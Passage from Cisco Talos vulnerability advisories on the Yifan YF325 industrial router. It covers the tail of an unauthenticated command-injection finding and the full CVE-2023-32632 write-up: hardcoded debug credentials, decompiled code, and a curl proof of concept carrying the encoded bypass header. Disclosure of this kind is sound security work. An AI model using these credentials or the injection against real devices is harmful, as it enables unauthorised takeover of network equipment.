The diag_ping_start function will fetch at [4] the request’s ping_ip parameter, which is used at [5] to execute the alias ping='ping -c 3'; eval "<ping_ip>" > /tmp/ping.log 2>&1 &. Despite the name of the functionality, which would suggest to only be used for performing ping operations, this code path is used to implement the “Diagnostic” page in the web server and execute command shell. But, because it is possible to reach the code at [5] without authentication, this becomes a security issue that could allow a potential attacker to execute arbitrary shell command.

**TIMELINE**

2023-06-28 - Initial Vendor Contact  
2023-07-06 - Vendor Disclosure  
2023-10-11 - Public Release

Discovered by Francesco Benvenuto of Cisco Talos.

CVE-2023-32632: TALOS-2023-1767 || Cisco Talos Intelligence Group

A leftover debug code vulnerability exists in the httpd debug credentials functionality of Yifan YF325 v1.0_20221108. A specially crafted network request can lead to authentication bypass. An attacker can send a network request to trigger this vulnerability.

**SUMMARY**

A leftover debug code vulnerability exists in the httpd debug credentials functionality of Yifan YF325 v1.0\_20221108. A specially crafted network request can lead to authentication bypass. An attacker can send a network request to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Yifan YF325 v1.0\_20221108

**PRODUCT URLS**

YF325 - https://yifanwireless.com/entry-level-wifi-router/yf325-series-gprs/3g/4g-wifi-router-with-sim-card-slot.html

**CVSSv3 SCORE**

9.8 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-489 - Leftover Debug Code

**DETAILS**

The Yifan YF325 is an industrial cellular router. This device is designed for M2M and IOT applications, allowing remote management, offering several VPN services and many other features.

The YF325 router provides a series of APIs, a set of which requires authentication prior to their execution. If the API requested requires valid credentials, they are checked by the httpd’s check_credentials function:

    bool check_credentials
                   (char *correct_username,char *correct_password,undefined4 param_3,char *Authorization
                   )
    
    {
      [...]
    
      provided_username._0_4_ = 0;
      memset(provided_username + 4,0,0x1f0);
      if (*correct_password == '\0') {
    auth_ok:
        auth_ok = true;
      }
      else {
        if ((Authorization != (char *)0x0) && (idx = strncmp(Authorization,"Basic ",6), idx == 0)) {
          [...]
    
          [... base64 decode Authorization value into provided_username ...]
    
          provided_password = strchr((char *)provided_username,L':');
          if (provided_password != (char *)0x0) {
            *provided_password = '\0';
            is_equal = strcmp((char *)provided_username,"ffadmin");                                                 [1]
            if ((is_equal == 0) && (idx = strcmp(provided_password + 1,"ffadminff"), idx == 0))                     [2]
            goto auth_ok;
            crypt_username = crypt((char *)provided_username,correct_username);
            if ((crypt_username != (char *)0x0) &&
               ((idx = strcmp(crypt_username,correct_username), idx == 0 &&
                (provided_password = crypt(provided_password + 1,correct_password),
                provided_password != (char *)0x0)))) {
              idx = strcmp(provided_password,correct_password);
              return idx == 0;
            }
          }
        }
        auth_ok = false;
      }
      return auth_ok;
    } This function will compare the provided username and password with the correct credentials, the ones of the admin. But, because of leftover debug code, there are some special debug credential, checked at `[1]` and `[2]`, that can bypass the credentials check, granting admin permissions with fixed credentials.
    

**Exploit Proof of Concept**

Following a request without credentials:

    $ curl -s http://<ROUTER_IP>/Status_Router.asp | head -n 20
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    
    <HTML><HEAD><TITLE>401 Unauthorized</TITLE></HEAD>
    [...] The resource is `Unauthorized`. Following the same request but with the debug credentials:
      
    $ curl -s -H "Authorization: Basic ZmZhZG1pbjpmZmFkbWluZmY=" http://<ROUTER_IP>/Status_Router.asp
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
    <html>
        <head>
            <meta http-equiv="Content-Type" content="application/xhtml+xml; charset=iso-8859-1; X-XSS-Protection: 1;mode=block" />
          [...]
    

**TIMELINE**

2023-06-28 - Initial Vendor Contact  
2023-07-06 - Vendor Disclosure  
2023-10-11 - Public Release

Discovered by Francesco Benvenuto of Cisco Talos.

Tag

#intel